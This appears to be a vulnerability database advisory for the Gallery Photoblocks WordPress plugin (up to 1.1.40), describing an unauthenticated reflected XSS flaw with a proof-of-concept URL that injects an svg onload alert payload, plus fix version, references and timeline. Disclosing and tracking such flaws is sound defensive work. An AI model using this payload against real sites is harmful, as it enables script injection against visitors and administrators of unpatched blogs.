Gallery Photoblocks <= 1.1.40 - Unauthenticated Reflected XSS



Description
Also Full Path Disclosure depending on the configuration of the server
Proof of Concept
https://<BLOG>/wp-content/plugins/photoblocks-grid-gallery/admin/partials/photoblocks-edit.php?id="><svg/onload=alert(/XSS/)>

Affects Plugin

fixed in version 1.1.41

References

URL https://plugins.trac.wordpress.org/changeset/2117972

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 2035
Verified Yes
WPVDB ID 9425

Timeline

Publicly Published 2019-07-05 (4 months ago)
Added 2019-07-05 (4 months ago)
Last Updated 2019-07-09 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin